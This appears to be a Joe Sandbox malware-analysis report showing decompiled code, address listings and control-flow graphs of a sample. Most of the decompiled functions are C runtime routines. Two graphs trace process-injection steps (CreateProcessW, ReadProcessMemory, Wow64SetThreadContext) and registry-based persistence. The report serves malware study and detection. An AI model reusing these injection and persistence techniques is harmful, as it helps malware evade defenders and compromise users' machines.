                                      										__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                      										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                      											L24:
                                      											__eflags = _t109 - _v16;
                                      											if(_t109 < _v16) {
                                      												_t89 = E0040249F(_t109, _t124, _t126); // executed
                                      												__eflags = _t89 - 0xffffffff;
                                      												if(_t89 == 0xffffffff) {
                                      													L45:
                                      													return (_t124 - _t109) / _a12;
                                      												}
                                      												__eflags = _v8;
                                      												if(_v8 == 0) {
                                      													L41:
                                      													__eflags = _a8 - 0xffffffff;
                                      													if(__eflags != 0) {
                                      														E00401A70(_a4, 0, _a8);
                                      													}
                                      													 *((intOrPtr*)(E00401E66(__eflags))) = 0x22;
                                      													L4:
                                      													E00401E14();
                                      													goto L5;
                                      												}
                                      												_v12 = _v12 + 1;
                                      												 *_v12 = _t89;
                                      												_t109 = _t109 - 1;
                                      												_t65 =  &_v8;
                                      												 *_t65 = _v8 - 1;
                                      												__eflags =  *_t65;
                                      												_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                      												goto L39;
                                      											}
                                      											__eflags = _v16;
                                      											if(_v16 == 0) {
                                      												_t96 = 0x7fffffff;
                                      												__eflags = _t109 - 0x7fffffff;
                                      												if(_t109 <= 0x7fffffff) {
                                      													_t96 = _t109;
                                      												}
                                      											} else {
                                      												__eflags = _t109 - 0x7fffffff;
                                      												if(_t109 <= 0x7fffffff) {
                                      													_t50 = _t109 % _v16;
                                      													__eflags = _t50;
                                      													_t120 = _t50;
                                      													_t101 = _t109;
                                      												} else {
                                      													_t120 = 0x7fffffff % _v16;
                                      													_t101 = 0x7fffffff;
                                      												}
                                      												_t96 = _t101 - _t120;
                                      											}
                                      											__eflags = _t96 - _v8;
                                      											if(_t96 > _v8) {
                                      												goto L41;
                                      											} else {
                                      												_push(_t96);
                                      												_push(_v12);
                                      												_push(E00402C6E(_t126)); // executed
                                      												_t98 = E00402B78(_t109, _t124, _t126, __eflags); // executed
                                      												_t127 = _t127 + 0xc;
                                      												__eflags = _t98;
                                      												if(_t98 == 0) {
                                      													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
                                      													goto L45;
                                      												}
                                      												__eflags = _t98 - 0xffffffff;
                                      												if(_t98 == 0xffffffff) {
                                      													L44:
                                      													_t72 = _t126 + 0xc;
                                      													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
                                      													__eflags =  *_t72;
                                      													goto L45;
                                      												}
                                      												_v12 = _v12 + _t98;
                                      												_t109 = _t109 - _t98;
                                      												_v8 = _v8 - _t98;
                                      												goto L39;
                                      											}
                                      										}
                                      										_t104 =  *(_t126 + 4);
                                      										__eflags = _t104;
                                      										if(__eflags == 0) {
                                      											goto L24;
                                      										}
                                      										if(__eflags < 0) {
                                      											goto L44;
                                      										}
                                      										_t125 = _t109;
                                      										__eflags = _t109 - _t104;
                                      										if(_t109 >= _t104) {
                                      											_t125 = _t104;
                                      										}
                                      										__eflags = _t125 - _v8;
                                      										if(_t125 > _v8) {
                                      											goto L41;
                                      										} else {
                                      											E00402C94(_v12, _v8,  *_t126, _t125);
                                      											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
                                      											 *_t126 =  *_t126 + _t125;
                                      											_v12 = _v12 + _t125;
                                      											_t109 = _t109 - _t125;
                                      											_t127 = _t127 + 0x10;
                                      											_v8 = _v8 - _t125;
                                      											_t124 = _v20;
                                      										}
                                      										L39:
                                      										__eflags = _t109;
                                      									} while (_t109 != 0);
                                      									goto L40;
                                      								}
                                      							}
                                      						}
                                      						_t82 = (_t82 | 0xffffffff) / _t123;
                                      						__eflags = _a16 - _t82;
                                      						if(_a16 <= _t82) {
                                      							goto L13;
                                      						}
                                      						goto L9;
                                      					}
                                      					L3:
                                      					 *((intOrPtr*)(E00401E66(_t131))) = 0x16;
                                      					goto L4;
                                      				}
                                      			}


























                                      0x00401433
                                      0x00401437
                                      0x0040143c
                                      0x0040143f
                                      0x00401442
                                      0x00401447
                                      0x00401463
                                      0x00000000
                                      0x0040144f
                                      0x0040144f
                                      0x00401451
                                      0x0040146a
                                      0x0040146d
                                      0x0040146f
                                      0x0040147d
                                      0x0040147d
                                      0x00401480
                                      0x00401486
                                      0x0040148b
                                      0x0040148b
                                      0x0040148e
                                      0x00401490
                                      0x00000000
                                      0x00401492
                                      0x00401499
                                      0x0040149c
                                      0x00000000
                                      0x00000000
                                      0x0040149e
                                      0x0040149e
                                      0x004014a2
                                      0x004014a9
                                      0x004014ac
                                      0x004014ae
                                      0x004014b8
                                      0x004014b0
                                      0x004014b3
                                      0x004014b3
                                      0x004014bf
                                      0x004014c1
                                      0x004015a1
                                      0x00000000
                                      0x004014c7
                                      0x004014c7
                                      0x004014c7
                                      0x004014ce
                                      0x00401514
                                      0x00401514
                                      0x00401517
                                      0x00401576
                                      0x0040157c
                                      0x0040157f
                                      0x004015d3
                                      0x00000000
                                      0x004015d9
                                      0x00401581
                                      0x00401585
                                      0x004015a9
                                      0x004015a9
                                      0x004015ad
                                      0x004015b7
                                      0x004015bc
                                      0x004015c4
                                      0x0040145e
                                      0x0040145e
                                      0x00000000
                                      0x0040145e
                                      0x0040158a
                                      0x0040158d
                                      0x00401592
                                      0x00401593
                                      0x00401593
                                      0x00401593
                                      0x00401596
                                      0x00000000
                                      0x00401596
                                      0x00401519
                                      0x0040151d
                                      0x0040153e
                                      0x00401543
                                      0x00401545
                                      0x00401547
                                      0x00401547
                                      0x0040151f
                                      0x00401526
                                      0x00401528
                                      0x00401535
                                      0x00401535
                                      0x00401535
                                      0x00401538
                                      0x0040152a
                                      0x0040152c
                                      0x0040152f
                                      0x0040152f
                                      0x0040153a
                                      0x0040153a
                                      0x00401549
                                      0x0040154c
                                      0x00000000
                                      0x0040154e
                                      0x0040154e
                                      0x0040154f
                                      0x00401559
                                      0x0040155a
                                      0x0040155f
                                      0x00401562
                                      0x00401564
                                      0x004015e1
                                      0x00000000
                                      0x004015e1
                                      0x00401566
                                      0x00401569
                                      0x004015cf
                                      0x004015cf
                                      0x004015cf
                                      0x004015cf
                                      0x00000000
                                      0x004015cf
                                      0x0040156b
                                      0x0040156e
                                      0x00401570
                                      0x00000000
                                      0x00401570
                                      0x0040154c
                                      0x004014d0
                                      0x004014d3
                                      0x004014d5
                                      0x00000000
                                      0x00000000
                                      0x004014d7
                                      0x00000000
                                      0x00000000
                                      0x004014dd
                                      0x004014df
                                      0x004014e1
                                      0x004014e3
                                      0x004014e3
                                      0x004014e5
                                      0x004014e8
                                      0x00000000
                                      0x004014ee
                                      0x004014f7
                                      0x004014fc
                                      0x004014ff
                                      0x00401501
                                      0x00401504
                                      0x00401506
                                      0x00401509
                                      0x0040150c
                                      0x0040150c
                                      0x00401599
                                      0x00401599
                                      0x00401599
                                      0x00000000
                                      0x004014c7
                                      0x004014c1
                                      0x00401490
                                      0x00401476
                                      0x00401478
                                      0x0040147b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040147b
                                      0x00401453
                                      0x00401458
                                      0x00000000
                                      0x00401458

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                      • String ID:
                                      • API String ID: 4048096073-0
                                      • Opcode ID: c2db5918d8f01fc94f51c2282817a0e3b7292169cb91a0fe4d0f8028f02a04b5
                                      • Instruction ID: 7a080fabcb58439197a1708b88f97224dc043be32e8d8de740e80110cf7f810b
                                      • Opcode Fuzzy Hash: c2db5918d8f01fc94f51c2282817a0e3b7292169cb91a0fe4d0f8028f02a04b5
                                      • Instruction Fuzzy Hash: DC51A871A00204EBDB249F79CD4469EB7B5AF80314F24823BE8267B2F0D7789E51DB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 182 2308ef-23090a call 23005f 185 23090d-230911 182->185 186 230913-230927 185->186 187 230929-230936 185->187 186->185 188 230939-23093d 187->188 189 230955-230962 188->189 190 23093f-230953 188->190 191 230965-230969 189->191 190->188 192 230981-230a5f call 230073 * 8 191->192 193 23096b-23097f 191->193 210 230a61-230a6b 192->210 211 230a76 192->211 193->191 210->211 212 230a6d-230a74 210->212 213 230a7a-230a96 211->213 212->213 215 230a98-230a9a 213->215 216 230a9f 213->216 217 230e19-230e1c 215->217 218 230aa6-230ace CreateProcessW 216->218 219 230ad0 218->219 220 230ad5-230aee 218->220 221 230dcd-230dd1 219->221 225 230af0 220->225 226 230af5-230b12 ReadProcessMemory 220->226 223 230dd3-230dd7 221->223 224 230e16-230e18 221->224 227 230dea-230dee 223->227 228 230dd9-230de4 223->228 224->217 225->221 231 230b14 226->231 232 230b19-230b22 226->232 229 230df0 227->229 230 230df6-230dfa 227->230 228->227 229->230 233 230e02-230e06 230->233 234 230dfc 230->234 231->221 235 230b24-230b33 232->235 236 230b49-230b68 call 231ab8 232->236 238 230e12-230e14 233->238 239 230e08-230e0d call 231a23 233->239 234->233 235->236 240 230b35-230b3b call 231a23 235->240 246 230b6a 236->246 247 230b6f-230b90 call 231bd2 236->247 238->217 239->238 245 230b40-230b42 240->245 245->236 249 230b44 245->249 246->221 251 230b92-230b99 247->251 252 230bd5-230bf5 call 231bd2 247->252 249->221 253 230bd0 251->253 254 230b9b-230bc7 call 231bd2 251->254 259 230bf7 252->259 260 230bfc-230c11 call 2300da 252->260 253->221 261 230bc9 254->261 262 230bce 254->262 259->221 265 230c1a-230c24 260->265 261->221 262->252 266 230c56-230c5a 265->266 267 230c26-230c54 call 2300da 265->267 269 230c60-230c6e 266->269 270 230d3a-230d56 call 231871 266->270 267->265 269->270 273 230c74-230c82 269->273 277 230d5a-230d7b Wow64SetThreadContext 270->277 278 230d58 270->278 273->270 276 230c88-230ca8 273->276 279 230cab-230caf 276->279 280 230d7f-230d89 call 231972 277->280 281 230d7d 277->281 278->221 279->270 282 230cb5-230cca 279->282 288 230d8b 280->288 289 230d8d-230d91 280->289 281->221 284 230cdc-230ce0 282->284 286 230ce2-230cee 284->286 287 230d1d-230d35 284->287 290 230cf0-230d19 286->290 291 230d1b 286->291 287->279 288->221 293 230d93 289->293 294 230d99-230d9d 289->294 290->291 291->284 293->294 295 230da5-230da9 294->295 296 230d9f 294->296 297 230db1-230db5 295->297 298 230dab 295->298 296->295 299 230dc1-230dc7 297->299 300 230db7-230dbc call 231a23 297->300 298->297 299->218 299->221 300->299
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924056794.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_230000_efwhixxln.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: D
                                      • API String ID: 0-2746444292
                                      • Opcode ID: eef6657ebfcf276ffa726e9be4f78ac4933c12ff829fc26e183018e920ae00a0
                                      • Instruction ID: 0ac5bbfd879835fbe985c4f1be9319e366482538a1e29571eb53269d451c8c11
                                      • Opcode Fuzzy Hash: eef6657ebfcf276ffa726e9be4f78ac4933c12ff829fc26e183018e920ae00a0
                                      • Instruction Fuzzy Hash: C902F3B0E20209EFDB14CF94CDA5BADBBB5FF08305F204059E515AA291D774AEA1DF24
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 342 230422-23077a call 23005f call 230073 * 13 377 23077e-230784 342->377 377->377 378 230786-23079c SHGetFolderPathW 377->378 379 2307a2-2307b0 378->379 380 2308e4 378->380 379->380 383 2307b6-2307d8 379->383 381 2308e6-2308ec 380->381 383->380 386 2307de-2307f5 383->386 386->380 388 2307fb-230811 386->388 390 230823-230831 call 23037c 388->390 391 230813-23081e 388->391 390->380 395 230837-23084c call 23020a 390->395 391->381 395->380 398 230852-230858 395->398 399 23085e-230879 RegGetValueW 398->399 399->380 400 23087b-230895 RegOpenKeyExW 399->400 400->399 401 230897-2308d7 RegSetValueExW 400->401 401->380 405 2308d9-2308e2 401->405 405->381
                                      APIs
                                      • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00230794
                                        • Part of subcall function 0023037C: PathFileExistsW.SHLWAPI(?), ref: 00230406
                                        • Part of subcall function 0023037C: CreateDirectoryW.KERNELBASE(?,00000000), ref: 00230412
                                        • Part of subcall function 0023020A: PathFileExistsW.SHLWAPI(?), ref: 002302E1
                                        • Part of subcall function 0023020A: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 002302FF
                                      • RegGetValueW.KERNEL32(80000001,?,?,0000FFFF,00000000,00000000,00000000), ref: 00230875
                                      • RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020006,?), ref: 00230891
                                      • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000103), ref: 002308CF
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924056794.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_230000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: FilePath$CreateExistsValue$DirectoryFolderOpen
                                      • String ID:
                                      • API String ID: 609136486-0
                                      • Opcode ID: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
                                      • Instruction ID: c4f91993aa8c38ab1cb4aa0bcf915e6ef4fe27ffafd7cd0dcc40d7b62eddb0be
                                      • Opcode Fuzzy Hash: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
                                      • Instruction Fuzzy Hash: 48D17E61E24358A9EB20DBF0DC51FEEB378EF14710F10549BE608EB190E7B14A84CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 407 23037c-23040b call 23005f call 230073 * 3 PathFileExistsW 417 23041a-23041f 407->417 418 23040d-230418 CreateDirectoryW 407->418 418->417
                                      APIs
                                      • PathFileExistsW.SHLWAPI(?), ref: 00230406
                                      • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00230412
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924056794.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_230000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryExistsFilePath
                                      • String ID:
                                      • API String ID: 2624722123-0
                                      • Opcode ID: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
                                      • Instruction ID: 99178689bc04bb612234f32b23deda82c7a5d749176871f02232cce0eb193535
                                      • Opcode Fuzzy Hash: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
                                      • Instruction Fuzzy Hash: 21118625A64348B4EB10ABF4EC22FBE7775DF40B50F10551BF904EB1A0E6754B50C7A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 419 4015e7-4015fb call 402ec0 422 40162c 419->422 423 4015fd-401600 419->423 424 40162e-401633 call 402f05 422->424 423->422 425 401602-401605 423->425 426 401634-40164f call 402dda call 40142b 425->426 427 401607-40160b 425->427 439 401654-401669 call 40166b 426->439 429 40161c-401627 call 401e66 call 401e14 427->429 430 40160d-401619 call 401a70 427->430 429->422 430->429 439->424
                                      C-Code - Quality: 88%
                                      			E004015E7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                      				intOrPtr _t19;
                                      				intOrPtr _t22;
                                      				void* _t33;
                                      
                                      				_push(0xc);
                                      				_push(0x40ac78);
                                      				E00402EC0(__ebx, __edi, __esi);
                                      				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
                                      				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
                                      					L6:
                                      					_t19 = 0;
                                      				} else {
                                      					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
                                      						E00402DDA( *((intOrPtr*)(_t33 + 0x18)));
                                      						 *((intOrPtr*)(_t33 - 4)) = 0;
                                      						_t22 = E0040142B( *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
                                      						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
                                      						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
                                      						E0040166B();
                                      						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
                                      					} else {
                                      						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
                                      						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
                                      							E00401A70( *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
                                      						}
                                      						 *((intOrPtr*)(E00401E66(_t41))) = 0x16;
                                      						E00401E14();
                                      						goto L6;
                                      					}
                                      				}
                                      				return E00402F05(_t19);
                                      			}






                                      0x004015e7
                                      0x004015e9
                                      0x004015ee
                                      0x004015f5
                                      0x004015fb
                                      0x0040162c
                                      0x0040162c
                                      0x00401602
                                      0x00401605
                                      0x00401637
                                      0x0040163d
                                      0x0040164f
                                      0x00401657
                                      0x0040165a
                                      0x00401661
                                      0x00401666
                                      0x00401607
                                      0x00401607
                                      0x0040160b
                                      0x00401614
                                      0x00401619
                                      0x00401621
                                      0x00401627
                                      0x00000000
                                      0x00401627
                                      0x00401605
                                      0x00401633

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: __lock_file_memset
                                      • String ID:
                                      • API String ID: 26237723-0
                                      • Opcode ID: a4892092d5a4bf77ef54ffd14b97ea99442a0dd2ebdd8a71d6323e11888831ed
                                      • Instruction ID: 1432d694e49892035cd49640c124f67d30fb60c17c6e27dc23578b4e63e7569d
                                      • Opcode Fuzzy Hash: a4892092d5a4bf77ef54ffd14b97ea99442a0dd2ebdd8a71d6323e11888831ed
                                      • Instruction Fuzzy Hash: CE015E71801209EBCF11AFA5CD0689E7B71AF04754F04853BF814261F1C77A8A62DFD9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 86%
                                      			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                      				signed int _t15;
                                      				signed int _t17;
                                      				void* _t26;
                                      				intOrPtr _t28;
                                      
                                      				_push(0xc);
                                      				_push(0x40ac98);
                                      				E00402EC0(__ebx, __edi, __esi);
                                      				_t28 =  *((intOrPtr*)(_t26 + 8));
                                      				_t29 = _t28 != 0;
                                      				if(_t28 != 0) {
                                      					E00402DDA( *((intOrPtr*)(_t26 + 8)));
                                      					_t5 = _t26 - 4;
                                      					 *_t5 =  *(_t26 - 4) & 0x00000000;
                                      					__eflags =  *_t5;
                                      					_t15 = E00401692( *((intOrPtr*)(_t26 + 8))); // executed
                                      					 *(_t26 - 0x1c) = _t15;
                                      					 *(_t26 - 4) = 0xfffffffe;
                                      					E00401881();
                                      					_t17 =  *(_t26 - 0x1c);
                                      				} else {
                                      					 *((intOrPtr*)(E00401E66(_t29))) = 0x16;
                                      					_t17 = E00401E14() | 0xffffffff;
                                      				}
                                      				return E00402F05(_t17);
                                      			}







                                      0x00401826
                                      0x00401828
                                      0x0040182d
                                      0x00401834
                                      0x0040183a
                                      0x0040183c
                                      0x00401856
                                      0x0040185c
                                      0x0040185c
                                      0x0040185c
                                      0x00401863
                                      0x00401869
                                      0x0040186c
                                      0x00401873
                                      0x00401878
                                      0x0040183e
                                      0x00401843
                                      0x0040184e
                                      0x0040184e
                                      0x00401880

                                      APIs
                                      • __lock_file.LIBCMT ref: 00401856
                                      • __ftell_nolock.LIBCMT ref: 00401863
                                        • Part of subcall function 00401E66: __getptd_noexit.LIBCMT ref: 00401E66
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                      • String ID:
                                      • API String ID: 2999321469-0
                                      • Opcode ID: 2f7d12aad4e0b1d2e4d8bbd7656003f04da6ec767f00e7c0b12c3a3379e513ce
                                      • Instruction ID: feae6ceb721645b16d524c482cd5f44518f1600b0ad4e177b0a0aa11da4d6246
                                      • Opcode Fuzzy Hash: 2f7d12aad4e0b1d2e4d8bbd7656003f04da6ec767f00e7c0b12c3a3379e513ce
                                      • Instruction Fuzzy Hash: 25F01C31800205EADB10BBB6CD0669D3A60AF00368F20C23BB414BA1F1DBBC8A429A5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 461 40854c-408556 462 408573-40857c 461->462 463 408558-408562 461->463 464 40857e 462->464 465 40857f-408584 462->465 463->462 466 408564-408572 call 401e66 463->466 464->465 467 408586-408597 RtlAllocateHeap 465->467 468 408599-4085a0 465->468 467->468 471 4085cb-4085cd 467->471 472 4085a2-4085ab call 402477 468->472 473 4085be-4085c3 468->473 472->465 477 4085ad-4085b2 472->477 473->471 475 4085c5 473->475 475->471 478 4085b4 477->478 479 4085ba-4085bc 477->479 478->479 479->471
                                      C-Code - Quality: 86%
                                      			E0040854C(signed int _a4, signed int _a8, long _a12) {
                                      				void* _t10;
                                      				long _t11;
                                      				long _t12;
                                      				signed int _t13;
                                      				signed int _t17;
                                      				long _t19;
                                      				long _t24;
                                      
                                      				_t17 = _a4;
                                      				if(_t17 == 0) {
                                      					L3:
                                      					_t24 = _t17 * _a8;
                                      					__eflags = _t24;
                                      					if(_t24 == 0) {
                                      						_t24 = _t24 + 1;
                                      						__eflags = _t24;
                                      					}
                                      					goto L5;
                                      					L6:
                                      					_t10 = RtlAllocateHeap( *0x40cfc4, 8, _t24); // executed
                                      					__eflags = 0;
                                      					if(0 == 0) {
                                      						goto L7;
                                      					}
                                      					L14:
                                      					return _t10;
                                      					goto L15;
                                      					L7:
                                      					__eflags =  *0x40d62c;
                                      					if( *0x40d62c == 0) {
                                      						_t19 = _a12;
                                      						__eflags = _t19;
                                      						if(_t19 != 0) {
                                      							 *_t19 = 0xc;
                                      						}
                                      					} else {
                                      						_t11 = E00402477(_t10, _t24);
                                      						__eflags = _t11;
                                      						if(_t11 != 0) {
                                      							L5:
                                      							_t10 = 0;
                                      							__eflags = _t24 - 0xffffffe0;
                                      							if(_t24 > 0xffffffe0) {
                                      								goto L7;
                                      							} else {
                                      								goto L6;
                                      							}
                                      						} else {
                                      							_t12 = _a12;
                                      							__eflags = _t12;
                                      							if(_t12 != 0) {
                                      								 *_t12 = 0xc;
                                      							}
                                      							_t10 = 0;
                                      						}
                                      					}
                                      					goto L14;
                                      				} else {
                                      					_t13 = 0xffffffe0;
                                      					_t27 = _t13 / _t17 - _a8;
                                      					if(_t13 / _t17 >= _a8) {
                                      						goto L3;
                                      					} else {
                                      						 *((intOrPtr*)(E00401E66(_t27))) = 0xc;
                                      						return 0;
                                      					}
                                      				}
                                      				L15:
                                      			}










                                      0x00408551
                                      0x00408556
                                      0x00408573
                                      0x00408578
                                      0x0040857a
                                      0x0040857c
                                      0x0040857e
                                      0x0040857e
                                      0x0040857e
                                      0x00000000
                                      0x00408586
                                      0x0040858f
                                      0x00408595
                                      0x00408597
                                      0x00000000
                                      0x00000000
                                      0x004085cb
                                      0x004085cd
                                      0x00000000
                                      0x00408599
                                      0x00408599
                                      0x004085a0
                                      0x004085be
                                      0x004085c1
                                      0x004085c3
                                      0x004085c5
                                      0x004085c5
                                      0x004085a2
                                      0x004085a3
                                      0x004085a9
                                      0x004085ab
                                      0x0040857f
                                      0x0040857f
                                      0x00408581
                                      0x00408584
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004085ad
                                      0x004085ad
                                      0x004085b0
                                      0x004085b2
                                      0x004085b4
                                      0x004085b4
                                      0x004085ba
                                      0x004085ba
                                      0x004085ab
                                      0x00000000
                                      0x00408558
                                      0x0040855c
                                      0x0040855f
                                      0x00408562
                                      0x00000000
                                      0x00408564
                                      0x00408569
                                      0x00408572
                                      0x00408572
                                      0x00408562
                                      0x00000000

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004059F6,?,?,00000000,00000000,00000000,?,004042A2,00000001,00000214,?,00401038), ref: 0040858F
                                        • Part of subcall function 00401E66: __getptd_noexit.LIBCMT ref: 00401E66
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: AllocateHeap__getptd_noexit
                                      • String ID:
                                      • API String ID: 328603210-0
                                      • Opcode ID: 78cb4feb16e057d0e2cb3cebff3c2ab0fabc03ed057622e3e76df3dd97b03fd8
                                      • Instruction ID: 13c43ce280eb49603ccc5c5fb654576f0c81eb5202d9f2d83ad5a1bfaa1574fb
                                      • Opcode Fuzzy Hash: 78cb4feb16e057d0e2cb3cebff3c2ab0fabc03ed057622e3e76df3dd97b03fd8
                                      • Instruction Fuzzy Hash: F501F531600211ABEB249F31DE45F6B3784ABA0370F00853FE895AB2D0CF38CC008A4C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00230EBF: GetSystemInfo.KERNELBASE(?), ref: 00230EDC
                                      • VirtualAllocExNuma.KERNELBASE(00000000), ref: 00230F82
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924056794.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_230000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: AllocInfoNumaSystemVirtual
                                      • String ID:
                                      • API String ID: 449148690-0
                                      • Opcode ID: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
                                      • Instruction ID: 0a4a893df6e495b1a52f29ec5a45e49203d58ca13e7248d66807325317a67d16
                                      • Opcode Fuzzy Hash: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
                                      • Instruction Fuzzy Hash: FBF012F0D6430DBAEB247BF08CABB6D76789F00701F104595BA04AA5C3DE785A204E7A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 513 401a4f-401a65 call 401991
                                      C-Code - Quality: 25%
                                      			E00401A4F(intOrPtr _a4, intOrPtr _a8) {
                                      				void* __ebp;
                                      				void* _t3;
                                      				void* _t4;
                                      				void* _t5;
                                      				void* _t6;
                                      				void* _t9;
                                      
                                      				_push(0x40);
                                      				_push(_a8);
                                      				_push(_a4);
                                      				_t3 = E00401991(_t4, _t5, _t6, _t9); // executed
                                      				return _t3;
                                      			}









                                      0x00401a54
                                      0x00401a56
                                      0x00401a59
                                      0x00401a5c
                                      0x00401a65

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
